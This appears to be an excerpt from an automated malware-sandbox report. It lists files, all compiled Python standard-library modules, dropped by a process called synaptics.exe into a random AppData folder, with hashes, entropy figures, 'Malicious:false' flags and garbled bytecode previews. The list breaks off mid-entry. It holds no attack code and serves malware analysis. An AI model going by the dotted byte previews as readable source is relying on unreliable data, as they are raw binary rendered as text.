                                                                                                                                                                                                            Entropy (8bit):5.306757684534711
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:shqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:1amjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                            MD5:789DFF134DBAF255729CD45DF2989A42
                                                                                                                                                                                                            SHA1:D2CEC311CD7F852853DE192E28C28458478627C0
                                                                                                                                                                                                            SHA-256:44591C94AE909F9BEE955B6439FBA7674524B5EA7412B430AEB3E8D0DC9A3E75
                                                                                                                                                                                                            SHA-512:4BC55DF337DA4876AE2B8373B5310C10C86937D9C78926470FD1149CB1E2817860B253A7CB1ABC171AB3F33B78C00CF08E413C638E9EDD7ECA51D5BD2C74D1C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61475
                                                                                                                                                                                                            Entropy (8bit):5.306757684534711
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:shqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:1amjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                            MD5:789DFF134DBAF255729CD45DF2989A42
                                                                                                                                                                                                            SHA1:D2CEC311CD7F852853DE192E28C28458478627C0
                                                                                                                                                                                                            SHA-256:44591C94AE909F9BEE955B6439FBA7674524B5EA7412B430AEB3E8D0DC9A3E75
                                                                                                                                                                                                            SHA-512:4BC55DF337DA4876AE2B8373B5310C10C86937D9C78926470FD1149CB1E2817860B253A7CB1ABC171AB3F33B78C00CF08E413C638E9EDD7ECA51D5BD2C74D1C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):951
                                                                                                                                                                                                            Entropy (8bit):5.421954556518975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lMBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB6R/mfju:lMzVu8wzVmxcZt0bJB65aa
                                                                                                                                                                                                            MD5:125DE7413FCD8C6DE47A6CFE83A30EE0
                                                                                                                                                                                                            SHA1:5622C962BCB5AEDCD8BEFE9259A5ED30648F1A17
                                                                                                                                                                                                            SHA-256:DC1227E14459277DDC7F0B9C5445349B074864FFD63FD8DC3CC4D03470F57C17
                                                                                                                                                                                                            SHA-512:F496262BD7D2FF5B3EFEBDC587CE715DA60FAC6147728AD0D777DFF5E0A23275747C60B7CBE901996813634CE75B5C52E499CB4915F29806284EE32A8C82498F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.breakZ.classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....6C:\Users\user\AppData\Local\xFSOj9El1Q\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4166
                                                                                                                                                                                                            Entropy (8bit):5.3288544448695925
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:nZ1Xjppmx0pYUG0wzU182J691Tc7mh5ae7y8:73yN10wzg6TTc7mh5vD
                                                                                                                                                                                                            MD5:5EA6ABB76B05D6228D1BE0EBE614612D
                                                                                                                                                                                                            SHA1:51D1206F5D26D08AC4AB5C6F0E6E039DAE07E4EA
                                                                                                                                                                                                            SHA-256:281F0691DD13CF139965CE30EE3EA57674AB3D8CC5A771982D33E0ED6C284311
                                                                                                                                                                                                            SHA-512:7B015F22CA5C8DAC1E670E5E486840C684119DA925F671F5EA1DF491C6C6ADDAB109F88430472566E6697ADAAAB09D6E26EC90F1619EC5E0F9112FB92411D605
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):46189
                                                                                                                                                                                                            Entropy (8bit):6.062500819386345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:r5YArctA0pztzQUB04zzRYKJFSd6tmm+a4L+P9cLjYp:l1YAGzbB04zVYAFU6x+a4aPuL8p
                                                                                                                                                                                                            MD5:FD0D37745902C070FCD8992C500F9C67
                                                                                                                                                                                                            SHA1:8A32C63DE06C049C9B6BE787D99CEA87C9045009
                                                                                                                                                                                                            SHA-256:04B38F745496A18A1B19CDCFDB013F05EF86747DFB753DE8581CC07F0C1F0633
                                                                                                                                                                                                            SHA-512:883ECEAABC2391991053E88B4844461EF766D333D45125FBB7939050F7E6504E4971945F89AFC3DA614BBF18D324564CD061DCC651F4280BB8742C5AB4BA448A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12124
                                                                                                                                                                                                            Entropy (8bit):5.378874754384823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:m+KxmpkRLMC//oP1CHyszdKXnoGwKjwmAKa09hs4Nr:Wmo2CHtgNAKl9hs45
                                                                                                                                                                                                            MD5:50E59BF2FB36D9437AF8D76ADD84E9F5
                                                                                                                                                                                                            SHA1:33CD1A3DC2C95F023523759D4D1382986C2CF8F7
                                                                                                                                                                                                            SHA-256:469C398853129841649596D411B2FF6B1BE0E010E2507C702378CC7C0D50D45F
                                                                                                                                                                                                            SHA-512:F4E4EAC0770E2278EB00B57F5B22D1D6C274E151F80A708DE4EEFF6FE1FB8A6726F7F747426CD4D5DE7B9C24FD05CC089042BF477AF6521EE23E08ECB94B1F8A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWNZ.FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONEZ.FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17643
                                                                                                                                                                                                            Entropy (8bit):5.677434950861475
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HYMcSuUoigjrH1V19yB/sWG5D+nTF+jZjB77rXw0:H9zgl0sWm4+jZjNw0
                                                                                                                                                                                                            MD5:E3D0B960C9414DA941246E477DE142B9
                                                                                                                                                                                                            SHA1:022D40802F454ADBA0997546926A32A1643336F1
                                                                                                                                                                                                            SHA-256:BF69617BFA21506392D3FED6614C4BAF45499FDA3C6FA30FFD3B62A46300B7DB
                                                                                                                                                                                                            SHA-512:C8E88E5F59871C3D5D243ECAECE955828CEB75A28B7D2FE19D9A2B489680AD4280FEC2D9C0D276366947C3D5F6FFDFB39554AFD150CAE7E191389F58EED83C29
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17643
                                                                                                                                                                                                            Entropy (8bit):5.677434950861475
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HYMcSuUoigjrH1V19yB/sWG5D+nTF+jZjB77rXw0:H9zgl0sWm4+jZjNw0
                                                                                                                                                                                                            MD5:E3D0B960C9414DA941246E477DE142B9
                                                                                                                                                                                                            SHA1:022D40802F454ADBA0997546926A32A1643336F1
                                                                                                                                                                                                            SHA-256:BF69617BFA21506392D3FED6614C4BAF45499FDA3C6FA30FFD3B62A46300B7DB
                                                                                                                                                                                                            SHA-512:C8E88E5F59871C3D5D243ECAECE955828CEB75A28B7D2FE19D9A2B489680AD4280FEC2D9C0D276366947C3D5F6FFDFB39554AFD150CAE7E191389F58EED83C29
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3957
                                                                                                                                                                                                            Entropy (8bit):5.48207399131393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r8lHqPqiKqqHW7Nd5pqKHQwmHv35UmyhWqgv0+USVqtnqqgqhy:r8IPq/qq27NVqKleemdq8LvVqtnqqgqU
                                                                                                                                                                                                            MD5:5F664C0F8FFB0BF70335BF42515446F3
                                                                                                                                                                                                            SHA1:77EF5C10AC77A92F7D2C2EA9A5AE5F5AD9BFB860
                                                                                                                                                                                                            SHA-256:072AAE2F22BB51F70141450E9399BC833FC2B2628D00268D3E324BDCD74FDFE1
                                                                                                                                                                                                            SHA-512:7C7FA3B53F9D2D6F13DE1A2B5143A9415BA989BEA4BD1FA3FB89DF71D98E578B1A913D7E43D9DD9571EBB50E129AEEA86B6D6B300CE0C1F3AC44938465092E4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3957
                                                                                                                                                                                                            Entropy (8bit):5.48207399131393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r8lHqPqiKqqHW7Nd5pqKHQwmHv35UkyhWqgv0+USVqtnqqgqhy:r8IPq/qq27NVqKleekdq8LvVqtnqqgqU
                                                                                                                                                                                                            MD5:F2080D8DA9B6CBFB9B8D28DF8E4AD235
                                                                                                                                                                                                            SHA1:EAE3D3C2E72A7DF2626A6F8002ECEF7B28E35DAE
                                                                                                                                                                                                            SHA-256:FA773226DA8B7DE817EA1279DA106B92BC1AF3D617A4CF80F49399AD79E8F826
                                                                                                                                                                                                            SHA-512:988A0492B35FE2E9C986161F0F58412D5B71BC139B17F4BE00563FE696AFC11268C7034D59CEA346347B194669927BF67D2C5DA939C6CC7BFE9EC8B52E7C83DC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15327
                                                                                                                                                                                                            Entropy (8bit):5.43342659646641
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:O7Vr8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:gra/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                            MD5:DEF977510C8437976A3125618E4A88AB
                                                                                                                                                                                                            SHA1:ACBEC7EECF9AD96FEF55B3DDF9B249617140DEA0
                                                                                                                                                                                                            SHA-256:FA2CB2B40479445962D666F3A75FE9BDA2D6515B11F522EFD7D4C9520C3080C1
                                                                                                                                                                                                            SHA-512:72E892623D6D2B32858C9D6F5D2C9DCC93A9A7C507261B32C63CEEE61117867132C812E703F2DC4E345D6485CFF34DBD8C3B85F3CA350A83C3DE00D78685DC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1771
                                                                                                                                                                                                            Entropy (8bit):5.545556989762179
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l/5kKoXsYZdrK2Ezwp8ItqhhhUIuoLpP0I2GIikGmObMn:ZhoP2hOqhDaodpkwbMn
                                                                                                                                                                                                            MD5:29B22E94CCCA7F20F091BDF7BB601B1A
                                                                                                                                                                                                            SHA1:0B657E54AD5D9533C17E7BFEE163FB10066A013E
                                                                                                                                                                                                            SHA-256:42F4029459481A9CB9DCBA8D1208B9DE854731D4B92AE9A4A5D38560A3DC84E6
                                                                                                                                                                                                            SHA-512:A258C6108A829C987B35D5D719D890A0883A391BC6A73977ABCB0D674552739FDFD19C54C8E621DEA974CF622188230520B8081C7A77DC70D431127253B0D028
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r.....9C:\Users\user\AppData\Local\xFSOj9El1Q\lib\nturl2path.py..url2pathname....s*.............................................r....c.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5471
                                                                                                                                                                                                            Entropy (8bit):5.651468757325197
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xsgyb2Y4AiIw0UEDJdWzvlNA/DFi1foNC3SdGCDO1WnOhf:/ySYRRDX9k1fb3H3WnOhf
                                                                                                                                                                                                            MD5:5E993B1C8A5DFB24019F1ABCC1FF04B3
                                                                                                                                                                                                            SHA1:AA2689E848010AC62366C6DC9A485C6613EE3303
                                                                                                                                                                                                            SHA-256:D5924795FED669EA7BF41AB2F13FBCC8F6E8E46C5CFC090B8DF6A8670772C67E
                                                                                                                                                                                                            SHA-512:FBD3DC56F676DBD9AA665D36212EF2B0FAA30B3D36907623D882BD776A4D847EE0018EFF1C0796291EFB41783E7DDC560D6D0B42C958AA60FF324C2266A7210B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s"...d.Z.g.d...Z.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.i.Z.d.d...e.d...D...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d ....e.d!d"....e.d#d$....e.d%d&....e.d'd(....e.d)d*....e.d+d,....e.d-d.....e.d/d0....e.d1d2....e.d3d4....e.d5d6....e.d7d8....e.d9d:....e.d;d<....e.d=d>....e.d?d@....e.dAdB....e.dCdD....e.dEdF....e.dGdH....e.dIdJ....e.dKdL....e.dMdN....e.dOdP....e.dQdR....e.dSdT....e.dUdV....e.dWdX....e.dYdZ....e.d[d\....e.d]d^....e.d_d`....e.dadb....e.dcdd....e.dedf....e.dgdh....e.didj....e.dkdl....e.dmdn....e.dodp....e.dqdr....e.dsdt....e.dudv....e.dwdx....e.dydz....e.d{d|....e.d}d~....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....d.Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e...d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13532
                                                                                                                                                                                                            Entropy (8bit):4.847870676171198
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:925I4L+HQe0C1/u2/DqnsvQgZ2CsiIKoVkDq01iYL5ADAzi8Lq4UZfm:g5feTs2rwejZ2CoKo4iY9cA+8LAfm
                                                                                                                                                                                                            MD5:AC65AD2CABB94CF45F80F5D79EC5BB57
